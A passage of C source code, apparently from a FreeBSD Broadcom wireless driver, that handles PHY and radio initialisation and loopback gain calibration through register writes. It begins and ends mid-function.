(phy->rev == 1) bwn_phy_init_b5(mac); else bwn_phy_init_b6(mac); if (phy->rev >= 2 || phy->gmode) bwn_phy_init_a(mac); if (phy->rev >= 2) { BWN_PHY_WRITE(mac, BWN_PHY_ANALOGOVER, 0); BWN_PHY_WRITE(mac, BWN_PHY_ANALOGOVERVAL, 0); } if (phy->rev == 2) { BWN_PHY_WRITE(mac, BWN_PHY_RFOVER, 0); BWN_PHY_WRITE(mac, BWN_PHY_PGACTL, 0xc0); } if (phy->rev > 5) { BWN_PHY_WRITE(mac, BWN_PHY_RFOVER, 0x400); BWN_PHY_WRITE(mac, BWN_PHY_PGACTL, 0xc0); } if (phy->gmode || phy->rev >= 2) { tmp = BWN_PHY_READ(mac, BWN_PHY_VERSION_OFDM); tmp &= BWN_PHYVER_VERSION; if (tmp == 3 || tmp == 5) { BWN_PHY_WRITE(mac, BWN_PHY_OFDM(0xc2), 0x1816); BWN_PHY_WRITE(mac, BWN_PHY_OFDM(0xc3), 0x8006); } if (tmp == 5) { BWN_PHY_SETMASK(mac, BWN_PHY_OFDM(0xcc), 0x00ff, 0x1f00); } } if ((phy->rev <= 2 &&
phy->gmode) || phy->rev >= 2) BWN_PHY_WRITE(mac, BWN_PHY_OFDM(0x7e), 0x78); if (phy->rf_rev == 8) { BWN_PHY_SET(mac, BWN_PHY_EXTG(0x01), 0x80); BWN_PHY_SET(mac, BWN_PHY_OFDM(0x3e), 0x4); } if (BWN_HAS_LOOPBACK(phy)) bwn_loopback_calcgain(mac); if (phy->rf_rev != 8) { if (pg->pg_initval == 0xffff) pg->pg_initval = bwn_rf_init_bcm2050(mac); else BWN_RF_WRITE(mac, 0x0078, pg->pg_initval); } bwn_lo_g_init(mac); if (BWN_HAS_TXMAG(phy)) { BWN_RF_WRITE(mac, 0x52, (BWN_RF_READ(mac, 0x52) & 0xff00) | pg->pg_loctl.tx_bias | pg->pg_loctl.tx_magn); } else { BWN_RF_SETMASK(mac, 0x52, 0xfff0, pg->pg_loctl.tx_bias); } if (phy->rev >= 6) { BWN_PHY_SETMASK(mac, BWN_PHY_CCK(0x36), 0x0fff, (pg->pg_loctl.tx_bias << 12)); } if (siba_sprom_get_bf_lo(sc->sc_dev) & BWN_BFL_PACTRL) BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x2e), 0x8075); else BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x2e), 0x807f); if (phy->rev < 2) BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x2f), 0x101); else BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x2f), 0x202); if (phy->gmode || phy->rev >= 2) { bwn_lo_g_adjust(mac); BWN_PHY_WRITE(mac, BWN_PHY_LO_MASK, 0x8078); } if (!(siba_sprom_get_bf_lo(sc->sc_dev) & BWN_BFL_RSSI)) { for (i = 0; i < 64; i++) { BWN_PHY_WRITE(mac, BWN_PHY_NRSSI_CTRL, i); BWN_PHY_WRITE(mac, BWN_PHY_NRSSI_DATA, (uint16_t)MIN(MAX(bwn_nrssi_read(mac, i) - 0xffff, -32), 31)); } bwn_nrssi_threshold(mac); } else if (phy->gmode || phy->rev >= 2) { if (pg->pg_nrssi[0] == -1000) { KASSERT(pg->pg_nrssi[1] == -1000, ("%s:%d: fail", __func__, __LINE__)); bwn_nrssi_slope_11g(mac); } else bwn_nrssi_threshold(mac); } if (phy->rf_rev == 8) BWN_PHY_WRITE(mac, BWN_PHY_EXTG(0x05), 0x3230); bwn_phy_hwpctl_init(mac); if ((siba_get_chipid(sc->sc_dev) == 0x4306 && siba_get_chippkg(sc->sc_dev) == 2) || 0) { BWN_PHY_MASK(mac, BWN_PHY_CRS0, 0xbfff); BWN_PHY_MASK(mac, BWN_PHY_OFDM(0xc3), 0x7fff); } } static uint8_t bwn_has_hwpctl(struct bwn_mac *mac) { if (mac->mac_phy.hwpctl == 0 || mac->mac_phy.use_hwpctl == NULL) return (0); return (mac->mac_phy.use_hwpctl(mac)); } static void bwn_phy_init_b5(struct bwn_mac *mac) { struct bwn_phy *phy = &mac->mac_phy; struct bwn_phy_g *pg = &phy->phy_g; struct bwn_softc *sc = mac->mac_sc; uint16_t offset, value; uint8_t old_channel; if (phy->analog == 1) BWN_RF_SET(mac, 0x007a, 0x0050); if ((siba_get_pci_subvendor(sc->sc_dev) != SIBA_BOARDVENDOR_BCM) && (siba_get_pci_subdevice(sc->sc_dev) != SIBA_BOARD_BU4306)) { value = 0x2120; for (offset = 0x00a8; offset < 0x00c7; offset++) { BWN_PHY_WRITE(mac, offset, value); value += 0x202; } } BWN_PHY_SETMASK(mac, 0x0035, 0xf0ff, 0x0700); if (phy->rf_ver == 0x2050) BWN_PHY_WRITE(mac, 0x0038, 0x0667); if (phy->gmode || phy->rev >= 2) { if (phy->rf_ver == 0x2050) { BWN_RF_SET(mac, 0x007a, 0x0020); BWN_RF_SET(mac, 0x0051, 0x0004); } BWN_WRITE_2(mac, BWN_PHY_RADIO, 0x0000); BWN_PHY_SET(mac, 0x0802, 0x0100); BWN_PHY_SET(mac, 0x042b, 0x2000); BWN_PHY_WRITE(mac, 0x001c, 0x186a); BWN_PHY_SETMASK(mac, 0x0013, 0x00ff, 0x1900); BWN_PHY_SETMASK(mac, 0x0035, 0xffc0, 0x0064); BWN_PHY_SETMASK(mac, 0x005d, 0xff80, 0x000a); } if (mac->mac_flags & BWN_MAC_FLAG_BADFRAME_PREEMP) BWN_PHY_SET(mac, BWN_PHY_RADIO_BITFIELD, (1 << 11)); if (phy->analog == 1) { BWN_PHY_WRITE(mac, 0x0026, 0xce00); BWN_PHY_WRITE(mac, 0x0021, 0x3763); BWN_PHY_WRITE(mac, 0x0022, 0x1bc3); BWN_PHY_WRITE(mac, 0x0023, 0x06f9); BWN_PHY_WRITE(mac, 0x0024, 0x037e); } else BWN_PHY_WRITE(mac, 0x0026, 0xcc00); BWN_PHY_WRITE(mac, 0x0030, 0x00c6); BWN_WRITE_2(mac, 0x03ec, 0x3f22); if (phy->analog == 1) BWN_PHY_WRITE(mac, 0x0020, 0x3e1c); else BWN_PHY_WRITE(mac, 0x0020, 
0x301c); if (phy->analog == 0) BWN_WRITE_2(mac, 0x03e4, 0x3000); old_channel = phy->chan; bwn_phy_g_switch_chan(mac, 7, 0); if (phy->rf_ver != 0x2050) { BWN_RF_WRITE(mac, 0x0075, 0x0080); BWN_RF_WRITE(mac, 0x0079, 0x0081); } BWN_RF_WRITE(mac, 0x0050, 0x0020); BWN_RF_WRITE(mac, 0x0050, 0x0023); if (phy->rf_ver == 0x2050) { BWN_RF_WRITE(mac, 0x0050, 0x0020); BWN_RF_WRITE(mac, 0x005a, 0x0070); } BWN_RF_WRITE(mac, 0x005b, 0x007b); BWN_RF_WRITE(mac, 0x005c, 0x00b0); BWN_RF_SET(mac, 0x007a, 0x0007); bwn_phy_g_switch_chan(mac, old_channel, 0); BWN_PHY_WRITE(mac, 0x0014, 0x0080); BWN_PHY_WRITE(mac, 0x0032, 0x00ca); BWN_PHY_WRITE(mac, 0x002a, 0x88a3); bwn_phy_g_set_txpwr_sub(mac, &pg->pg_bbatt, &pg->pg_rfatt, pg->pg_txctl); if (phy->rf_ver == 0x2050) BWN_RF_WRITE(mac, 0x005d, 0x000d); BWN_WRITE_2(mac, 0x03e4, (BWN_READ_2(mac, 0x03e4) & 0xffc0) | 0x0004); } static void bwn_loopback_calcgain(struct bwn_mac *mac) { struct bwn_phy *phy = &mac->mac_phy; struct bwn_phy_g *pg = &phy->phy_g; struct bwn_softc *sc = mac->mac_sc; uint16_t backup_phy[16] = { 0 }; uint16_t backup_radio[3]; uint16_t backup_bband; uint16_t i, j, loop_i_max; uint16_t trsw_rx; uint16_t loop1_outer_done, loop1_inner_done; backup_phy[0] = BWN_PHY_READ(mac, BWN_PHY_CRS0); backup_phy[1] = BWN_PHY_READ(mac, BWN_PHY_CCKBBANDCFG); backup_phy[2] = BWN_PHY_READ(mac, BWN_PHY_RFOVER); backup_phy[3] = BWN_PHY_READ(mac, BWN_PHY_RFOVERVAL); if (phy->rev != 1) { backup_phy[4] = BWN_PHY_READ(mac, BWN_PHY_ANALOGOVER); backup_phy[5] = BWN_PHY_READ(mac, BWN_PHY_ANALOGOVERVAL); } backup_phy[6] = BWN_PHY_READ(mac, BWN_PHY_CCK(0x5a)); backup_phy[7] = BWN_PHY_READ(mac, BWN_PHY_CCK(0x59)); backup_phy[8] = BWN_PHY_READ(mac, BWN_PHY_CCK(0x58)); backup_phy[9] = BWN_PHY_READ(mac, BWN_PHY_CCK(0x0a)); backup_phy[10] = BWN_PHY_READ(mac, BWN_PHY_CCK(0x03)); backup_phy[11] = BWN_PHY_READ(mac, BWN_PHY_LO_MASK); backup_phy[12] = BWN_PHY_READ(mac, BWN_PHY_LO_CTL); backup_phy[13] = BWN_PHY_READ(mac, BWN_PHY_CCK(0x2b)); backup_phy[14] = BWN_PHY_READ(mac, BWN_PHY_PGACTL); backup_phy[15] = BWN_PHY_READ(mac, BWN_PHY_LO_LEAKAGE); backup_bband = pg->pg_bbatt.att; backup_radio[0] = BWN_RF_READ(mac, 0x52); backup_radio[1] = BWN_RF_READ(mac, 0x43); backup_radio[2] = BWN_RF_READ(mac, 0x7a); BWN_PHY_MASK(mac, BWN_PHY_CRS0, 0x3fff); BWN_PHY_SET(mac, BWN_PHY_CCKBBANDCFG, 0x8000); BWN_PHY_SET(mac, BWN_PHY_RFOVER, 0x0002); BWN_PHY_MASK(mac, BWN_PHY_RFOVERVAL, 0xfffd); BWN_PHY_SET(mac, BWN_PHY_RFOVER, 0x0001); BWN_PHY_MASK(mac, BWN_PHY_RFOVERVAL, 0xfffe); if (phy->rev != 1) { BWN_PHY_SET(mac, BWN_PHY_ANALOGOVER, 0x0001); BWN_PHY_MASK(mac, BWN_PHY_ANALOGOVERVAL, 0xfffe); BWN_PHY_SET(mac, BWN_PHY_ANALOGOVER, 0x0002); BWN_PHY_MASK(mac, BWN_PHY_ANALOGOVERVAL, 0xfffd); } BWN_PHY_SET(mac, BWN_PHY_RFOVER, 0x000c); BWN_PHY_SET(mac, BWN_PHY_RFOVERVAL, 0x000c); BWN_PHY_SET(mac, BWN_PHY_RFOVER, 0x0030); BWN_PHY_SETMASK(mac, BWN_PHY_RFOVERVAL, 0xffcf, 0x10); BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x5a), 0x0780); BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x59), 0xc810); BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x58), 0x000d); BWN_PHY_SET(mac, BWN_PHY_CCK(0x0a), 0x2000); if (phy->rev != 1) { BWN_PHY_SET(mac, BWN_PHY_ANALOGOVER, 0x0004); BWN_PHY_MASK(mac, BWN_PHY_ANALOGOVERVAL, 0xfffb); } BWN_PHY_SETMASK(mac, BWN_PHY_CCK(0x03), 0xff9f, 0x40); if (phy->rf_rev == 8) BWN_RF_WRITE(mac, 0x43, 0x000f); else { BWN_RF_WRITE(mac, 0x52, 0); BWN_RF_SETMASK(mac, 0x43, 0xfff0, 0x9); } bwn_phy_g_set_bbatt(mac, 11); if (phy->rev >= 3) BWN_PHY_WRITE(mac, BWN_PHY_LO_MASK, 0xc020); else BWN_PHY_WRITE(mac, BWN_PHY_LO_MASK, 0x8020); 
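/* The override writes that follow put the RF/baseband into a loopback measurement state; the nested loops further below then step the attenuation codes until the measured LO leakage (BWN_PHY_LO_LEAKAGE) reaches 0xdfc, and the resulting loop counters feed the pg_max_lb_gain and pg_trsw_rx_gain calculations once the saved registers have been restored. */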
BWN_PHY_WRITE(mac, BWN_PHY_LO_CTL, 0); BWN_PHY_SETMASK(mac, BWN_PHY_CCK(0x2b), 0xffc0, 0x01); BWN_PHY_SETMASK(mac, BWN_PHY_CCK(0x2b), 0xc0ff, 0x800); BWN_PHY_SET(mac, BWN_PHY_RFOVER, 0x0100); BWN_PHY_MASK(mac, BWN_PHY_RFOVERVAL, 0xcfff); if (siba_sprom_get_bf_lo(sc->sc_dev) & BWN_BFL_EXTLNA) { if (phy->rev >= 7) { BWN_PHY_SET(mac, BWN_PHY_RFOVER, 0x0800); BWN_PHY_SET(mac, BWN_PHY_RFOVERVAL, 0x8000); } } BWN_RF_MASK(mac, 0x7a, 0x00f7); j = 0; loop_i_max = (phy->rf_rev == 8) ? 15 : 9; for (i = 0; i < loop_i_max; i++) { for (j = 0; j < 16; j++) { BWN_RF_WRITE(mac, 0x43, i); BWN_PHY_SETMASK(mac, BWN_PHY_RFOVERVAL, 0xf0ff, (j << 8)); BWN_PHY_SETMASK(mac, BWN_PHY_PGACTL, 0x0fff, 0xa000); BWN_PHY_SET(mac, BWN_PHY_PGACTL, 0xf000); DELAY(20); if (BWN_PHY_READ(mac, BWN_PHY_LO_LEAKAGE) >= 0xdfc) goto done0; } } done0: loop1_outer_done = i; loop1_inner_done = j; if (j >= 8) { BWN_PHY_SET(mac, BWN_PHY_RFOVERVAL, 0x30); trsw_rx = 0x1b; for (j = j - 8; j < 16; j++) { BWN_PHY_SETMASK(mac, BWN_PHY_RFOVERVAL, 0xf0ff, j << 8); BWN_PHY_SETMASK(mac, BWN_PHY_PGACTL, 0x0fff, 0xa000); BWN_PHY_SET(mac, BWN_PHY_PGACTL, 0xf000); DELAY(20); trsw_rx -= 3; if (BWN_PHY_READ(mac, BWN_PHY_LO_LEAKAGE) >= 0xdfc) goto done1; } } else trsw_rx = 0x18; done1: if (phy->rev != 1) { BWN_PHY_WRITE(mac, BWN_PHY_ANALOGOVER, backup_phy[4]); BWN_PHY_WRITE(mac, BWN_PHY_ANALOGOVERVAL, backup_phy[5]); } BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x5a), backup_phy[6]); BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x59), backup_phy[7]); BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x58), backup_phy[8]); BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x0a), backup_phy[9]); BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x03), backup_phy[10]); BWN_PHY_WRITE(mac, BWN_PHY_LO_MASK, backup_phy[11]); BWN_PHY_WRITE(mac, BWN_PHY_LO_CTL, backup_phy[12]); BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x2b), backup_phy[13]); BWN_PHY_WRITE(mac, BWN_PHY_PGACTL, backup_phy[14]); bwn_phy_g_set_bbatt(mac, backup_bband); BWN_RF_WRITE(mac, 0x52, backup_radio[0]); BWN_RF_WRITE(mac, 0x43, backup_radio[1]); BWN_RF_WRITE(mac, 0x7a, backup_radio[2]); BWN_PHY_WRITE(mac, BWN_PHY_RFOVER, backup_phy[2] | 0x0003); DELAY(10); BWN_PHY_WRITE(mac, BWN_PHY_RFOVER, backup_phy[2]); BWN_PHY_WRITE(mac, BWN_PHY_RFOVERVAL, backup_phy[3]); BWN_PHY_WRITE(mac, BWN_PHY_CRS0, backup_phy[0]); BWN_PHY_WRITE(mac, BWN_PHY_CCKBBANDCFG, backup_phy[1]); pg->pg_max_lb_gain = ((loop1_inner_done * 6) - (loop1_outer_done * 4)) - 11; pg->pg_trsw_rx_gain = trsw_rx * 2; } static uint16_t bwn_rf_init_bcm2050(struct bwn_mac *mac) { struct bwn_phy *phy = &mac->mac_phy; uint32_t tmp1 = 0, tmp2 = 0; uint16_t rcc, i, j, pgactl, cck0, cck1, cck2, cck3, rfover, rfoverval, analogover, analogoverval, crs0, classctl, lomask, loctl, syncctl, radio0, radio1, radio2, reg0, reg1, reg2, radio78, reg, index; static const uint8_t rcc_table[] = { 0x02, 0x03, 0x01, 0x0f, 0x06, 0x07, 0x05, 0x0f, 0x0a, 0x0b, 0x09, 0x0f, 0x0e, 0x0f, 0x0d, 0x0f, }; loctl = lomask = reg0 = classctl = crs0 = analogoverval = analogover = rfoverval = rfover = cck3 = 0; radio0 = BWN_RF_READ(mac, 0x43); radio1 = BWN_RF_READ(mac, 0x51); radio2 = BWN_RF_READ(mac, 0x52); pgactl = BWN_PHY_READ(mac, BWN_PHY_PGACTL); cck0 = BWN_PHY_READ(mac, BWN_PHY_CCK(0x5a)); cck1 = BWN_PHY_READ(mac, BWN_PHY_CCK(0x59)); cck2 = BWN_PHY_READ(mac, BWN_PHY_CCK(0x58)); if (phy->type == BWN_PHYTYPE_B) { cck3 = BWN_PHY_READ(mac, BWN_PHY_CCK(0x30)); reg0 = BWN_READ_2(mac, 0x3ec); BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x30), 0xff); BWN_WRITE_2(mac, 0x3ec, 0x3f3f); } else if (phy->gmode || phy->rev >= 2) { rfover = BWN_PHY_READ(mac, BWN_PHY_RFOVER); rfoverval = 
BWN_PHY_READ(mac, BWN_PHY_RFOVERVAL); analogover = BWN_PHY_READ(mac, BWN_PHY_ANALOGOVER); analogoverval = BWN_PHY_READ(mac, BWN_PHY_ANALOGOVERVAL); crs0 = BWN_PHY_READ(mac, BWN_PHY_CRS0); classctl = BWN_PHY_READ(mac, BWN_PHY_CLASSCTL); BWN_PHY_SET(mac, BWN_PHY_ANALOGOVER, 0x0003); BWN_PHY_MASK(mac, BWN_PHY_ANALOGOVERVAL, 0xfffc); BWN_PHY_MASK(mac, BWN_PHY_CRS0, 0x7fff); BWN_PHY_MASK(mac, BWN_PHY_CLASSCTL, 0xfffc); if (BWN_HAS_LOOPBACK(phy)) { lomask = BWN_PHY_READ(mac, BWN_PHY_LO_MASK); loctl = BWN_PHY_READ(mac, BWN_PHY_LO_CTL); if (phy->rev >= 3) BWN_PHY_WRITE(mac, BWN_PHY_LO_MASK, 0xc020); else BWN_PHY_WRITE(mac, BWN_PHY_LO_MASK, 0x8020); BWN_PHY_WRITE(mac, BWN_PHY_LO_CTL, 0); } BWN_PHY_WRITE(mac, BWN_PHY_RFOVERVAL, bwn_rf_2050_rfoverval(mac, BWN_PHY_RFOVERVAL, BWN_LPD(0, 1, 1))); BWN_PHY_WRITE(mac, BWN_PHY_RFOVER, bwn_rf_2050_rfoverval(mac, BWN_PHY_RFOVER, 0)); } BWN_WRITE_2(mac, 0x3e2, BWN_READ_2(mac, 0x3e2) | 0x8000); syncctl = BWN_PHY_READ(mac, BWN_PHY_SYNCCTL); BWN_PHY_MASK(mac, BWN_PHY_SYNCCTL, 0xff7f); reg1 = BWN_READ_2(mac, 0x3e6); reg2 = BWN_READ_2(mac, 0x3f4); if (phy->analog == 0) BWN_WRITE_2(mac, 0x03e6, 0x0122); else { if (phy->analog >= 2) BWN_PHY_SETMASK(mac, BWN_PHY_CCK(0x03), 0xffbf, 0x40); BWN_WRITE_2(mac, BWN_CHANNEL_EXT, (BWN_READ_2(mac, BWN_CHANNEL_EXT) | 0x2000)); } reg = BWN_RF_READ(mac, 0x60); index = (reg & 0x001e) >> 1; rcc = (((rcc_table[index] << 1) | (reg & 0x0001)) | 0x0020); if (phy->type == BWN_PHYTYPE_B) BWN_RF_WRITE(mac, 0x78, 0x26); if (phy->gmode || phy->rev >= 2) { BWN_PHY_WRITE(mac, BWN_PHY_RFOVERVAL, bwn_rf_2050_rfoverval(mac, BWN_PHY_RFOVERVAL, BWN_LPD(0, 1, 1))); } BWN_PHY_WRITE(mac, BWN_PHY_PGACTL, 0xbfaf); BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x2b), 0x1403); if (phy->gmode || phy->rev >= 2) { BWN_PHY_WRITE(mac, BWN_PHY_RFOVERVAL, bwn_rf_2050_rfoverval(mac, BWN_PHY_RFOVERVAL, BWN_LPD(0, 0, 1))); } BWN_PHY_WRITE(mac, BWN_PHY_PGACTL, 0xbfa0); BWN_RF_SET(mac, 0x51, 0x0004); if (phy->rf_rev == 8) BWN_RF_WRITE(mac, 0x43, 0x1f); else { BWN_RF_WRITE(mac, 0x52, 0); BWN_RF_SETMASK(mac, 0x43, 0xfff0, 0x0009); } BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x58), 0); for (i = 0; i < 16; i++) { BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x5a), 0x0480); BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x59), 0xc810); BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x58), 0x000d); if (phy->gmode || phy->rev >= 2) { BWN_PHY_WRITE(mac, BWN_PHY_RFOVERVAL, bwn_rf_2050_rfoverval(mac, BWN_PHY_RFOVERVAL, BWN_LPD(1, 0, 1))); } BWN_PHY_WRITE(mac, BWN_PHY_PGACTL, 0xafb0); DELAY(10); if (phy->gmode || phy->rev >= 2) { BWN_PHY_WRITE(mac, BWN_PHY_RFOVERVAL, bwn_rf_2050_rfoverval(mac, BWN_PHY_RFOVERVAL, BWN_LPD(1, 0, 1))); } BWN_PHY_WRITE(mac, BWN_PHY_PGACTL, 0xefb0); DELAY(10); if (phy->gmode || phy->rev >= 2) { BWN_PHY_WRITE(mac, BWN_PHY_RFOVERVAL, bwn_rf_2050_rfoverval(mac, BWN_PHY_RFOVERVAL, BWN_LPD(1, 0, 0))); } BWN_PHY_WRITE(mac, BWN_PHY_PGACTL, 0xfff0); DELAY(20); tmp1 += BWN_PHY_READ(mac, BWN_PHY_LO_LEAKAGE); BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x58), 0); if (phy->gmode || phy->rev >= 2) { BWN_PHY_WRITE(mac, BWN_PHY_RFOVERVAL, bwn_rf_2050_rfoverval(mac, BWN_PHY_RFOVERVAL, BWN_LPD(1, 0, 1))); } BWN_PHY_WRITE(mac, BWN_PHY_PGACTL, 0xafb0); } DELAY(10); BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x58), 0); tmp1++; tmp1 >>= 9; for (i = 0; i < 16; i++) { radio78 = (BWN_BITREV4(i) << 1) | 0x0020; BWN_RF_WRITE(mac, 0x78, radio78); DELAY(10); for (j = 0; j < 16; j++) { BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x5a), 0x0d80); BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x59), 0xc810); BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x58), 0x000d); if (phy->gmode || phy->rev >= 2) { 
BWN_PHY_WRITE(mac, BWN_PHY_RFOVERVAL, bwn_rf_2050_rfoverval(mac, BWN_PHY_RFOVERVAL, BWN_LPD(1, 0, 1))); } BWN_PHY_WRITE(mac, BWN_PHY_PGACTL, 0xafb0); DELAY(10); if (phy->gmode || phy->rev >= 2) { BWN_PHY_WRITE(mac, BWN_PHY_RFOVERVAL, bwn_rf_2050_rfoverval(mac, BWN_PHY_RFOVERVAL, BWN_LPD(1, 0, 1))); } BWN_PHY_WRITE(mac, BWN_PHY_PGACTL, 0xefb0); DELAY(10); if (phy->gmode || phy->rev >= 2) { BWN_PHY_WRITE(mac, BWN_PHY_RFOVERVAL, bwn_rf_2050_rfoverval(mac, BWN_PHY_RFOVERVAL, BWN_LPD(1, 0, 0))); } BWN_PHY_WRITE(mac, BWN_PHY_PGACTL, 0xfff0); DELAY(10); tmp2 += BWN_PHY_READ(mac, BWN_PHY_LO_LEAKAGE); BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x58), 0); if (phy->gmode || phy->rev >= 2) { BWN_PHY_WRITE(mac, BWN_PHY_RFOVERVAL, bwn_rf_2050_rfoverval(mac, BWN_PHY_RFOVERVAL, BWN_LPD(1, 0, 1))); } BWN_PHY_WRITE(mac, BWN_PHY_PGACTL, 0xafb0); } tmp2++; tmp2 >>= 8; if (tmp1 < tmp2) break; } BWN_PHY_WRITE(mac, BWN_PHY_PGACTL, pgactl); BWN_RF_WRITE(mac, 0x51, radio1); BWN_RF_WRITE(mac, 0x52, radio2); BWN_RF_WRITE(mac, 0x43, radio0); BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x5a), cck0); BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x59), cck1); BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x58), cck2); BWN_WRITE_2(mac, 0x3e6, reg1); if (phy->analog != 0) BWN_WRITE_2(mac, 0x3f4, reg2); BWN_PHY_WRITE(mac, BWN_PHY_SYNCCTL, syncctl); bwn_spu_workaround(mac, phy->chan); if (phy->type == BWN_PHYTYPE_B) { BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x30), cck3); BWN_WRITE_2(mac, 0x3ec, reg0); } else if (phy->gmode) { BWN_WRITE_2(mac, BWN_PHY_RADIO, BWN_READ_2(mac, BWN_PHY_RADIO) & 0x7fff); BWN_PHY_WRITE(mac, BWN_PHY_RFOVER, rfover); BWN_PHY_WRITE(mac, BWN_PHY_RFOVERVAL, rfoverval); BWN_PHY_WRITE(mac, BWN_PHY_ANALOGOVER, analogover); BWN_PHY_WRITE(mac, BWN_PHY_ANALOGOVERVAL, analogoverval); BWN_PHY_WRITE(mac, BWN_PHY_CRS0, crs0); BWN_PHY_WRITE(mac, BWN_PHY_CLASSCTL, classctl); if (BWN_HAS_LOOPBACK(phy)) { BWN_PHY_WRITE(mac, BWN_PHY_LO_MASK, lomask); BWN_PHY_WRITE(mac, BWN_PHY_LO_CTL, loctl); } } return ((i > 15) ? 
radio78 : rcc); } static void bwn_phy_init_b6(struct bwn_mac *mac) { struct bwn_phy *phy = &mac->mac_phy; struct bwn_phy_g *pg = &phy->phy_g; struct bwn_softc *sc = mac->mac_sc; uint16_t offset, val; uint8_t old_channel; KASSERT(!(phy->rf_rev == 6 || phy->rf_rev == 7), ("%s:%d: fail", __func__, __LINE__)); BWN_PHY_WRITE(mac, 0x003e, 0x817a); BWN_RF_WRITE(mac, 0x007a, BWN_RF_READ(mac, 0x007a) | 0x0058); if (phy->rf_rev == 4 || phy->rf_rev == 5) { BWN_RF_WRITE(mac, 0x51, 0x37); BWN_RF_WRITE(mac, 0x52, 0x70); BWN_RF_WRITE(mac, 0x53, 0xb3); BWN_RF_WRITE(mac, 0x54, 0x9b); BWN_RF_WRITE(mac, 0x5a, 0x88); BWN_RF_WRITE(mac, 0x5b, 0x88); BWN_RF_WRITE(mac, 0x5d, 0x88); BWN_RF_WRITE(mac, 0x5e, 0x88); BWN_RF_WRITE(mac, 0x7d, 0x88); bwn_hf_write(mac, bwn_hf_read(mac) | BWN_HF_TSSI_RESET_PSM_WORKAROUN); } if (phy->rf_rev == 8) { BWN_RF_WRITE(mac, 0x51, 0); BWN_RF_WRITE(mac, 0x52, 0x40); BWN_RF_WRITE(mac, 0x53, 0xb7); BWN_RF_WRITE(mac, 0x54, 0x98); BWN_RF_WRITE(mac, 0x5a, 0x88); BWN_RF_WRITE(mac, 0x5b, 0x6b); BWN_RF_WRITE(mac, 0x5c, 0x0f); if (siba_sprom_get_bf_lo(sc->sc_dev) & BWN_BFL_ALTIQ) { BWN_RF_WRITE(mac, 0x5d, 0xfa); BWN_RF_WRITE(mac, 0x5e, 0xd8); } else { BWN_RF_WRITE(mac, 0x5d, 0xf5); BWN_RF_WRITE(mac, 0x5e, 0xb8); } BWN_RF_WRITE(mac, 0x0073, 0x0003); BWN_RF_WRITE(mac, 0x007d, 0x00a8); BWN_RF_WRITE(mac, 0x007c, 0x0001); BWN_RF_WRITE(mac, 0x007e, 0x0008); } for (val = 0x1e1f, offset = 0x0088; offset < 0x0098; offset++) { BWN_PHY_WRITE(mac, offset, val); val -= 0x0202; } for (val = 0x3e3f, offset = 0x0098; offset < 0x00a8; offset++) { BWN_PHY_WRITE(mac, offset, val); val -= 0x0202; } for (val = 0x2120, offset = 0x00a8; offset < 0x00c8; offset++) { BWN_PHY_WRITE(mac, offset, (val & 0x3f3f)); val += 0x0202; } if (phy->type == BWN_PHYTYPE_G) { BWN_RF_SET(mac, 0x007a, 0x0020); BWN_RF_SET(mac, 0x0051, 0x0004); BWN_PHY_SET(mac, 0x0802, 0x0100); BWN_PHY_SET(mac, 0x042b, 0x2000); BWN_PHY_WRITE(mac, 0x5b, 0); BWN_PHY_WRITE(mac, 0x5c, 0); } old_channel = phy->chan; bwn_phy_g_switch_chan(mac, (old_channel >= 8) ? 
1 : 13, 0); BWN_RF_WRITE(mac, 0x0050, 0x0020); BWN_RF_WRITE(mac, 0x0050, 0x0023); DELAY(40); if (phy->rf_rev < 6 || phy->rf_rev == 8) { BWN_RF_WRITE(mac, 0x7c, BWN_RF_READ(mac, 0x7c) | 0x0002); BWN_RF_WRITE(mac, 0x50, 0x20); } if (phy->rf_rev <= 2) { BWN_RF_WRITE(mac, 0x7c, 0x20); BWN_RF_WRITE(mac, 0x5a, 0x70); BWN_RF_WRITE(mac, 0x5b, 0x7b); BWN_RF_WRITE(mac, 0x5c, 0xb0); } BWN_RF_SETMASK(mac, 0x007a, 0x00f8, 0x0007); bwn_phy_g_switch_chan(mac, old_channel, 0); BWN_PHY_WRITE(mac, 0x0014, 0x0200); if (phy->rf_rev >= 6) BWN_PHY_WRITE(mac, 0x2a, 0x88c2); else BWN_PHY_WRITE(mac, 0x2a, 0x8ac0); BWN_PHY_WRITE(mac, 0x0038, 0x0668); bwn_phy_g_set_txpwr_sub(mac, &pg->pg_bbatt, &pg->pg_rfatt, pg->pg_txctl); if (phy->rf_rev <= 5) BWN_PHY_SETMASK(mac, 0x5d, 0xff80, 0x0003); if (phy->rf_rev <= 2) BWN_RF_WRITE(mac, 0x005d, 0x000d); if (phy->analog == 4) { BWN_WRITE_2(mac, 0x3e4, 9); BWN_PHY_MASK(mac, 0x61, 0x0fff); } else BWN_PHY_SETMASK(mac, 0x0002, 0xffc0, 0x0004); if (phy->type == BWN_PHYTYPE_B) KASSERT(0 == 1, ("%s:%d: fail", __func__, __LINE__)); else if (phy->type == BWN_PHYTYPE_G) BWN_WRITE_2(mac, 0x03e6, 0x0); } static void bwn_phy_init_a(struct bwn_mac *mac) { struct bwn_phy *phy = &mac->mac_phy; struct bwn_softc *sc = mac->mac_sc; KASSERT(phy->type == 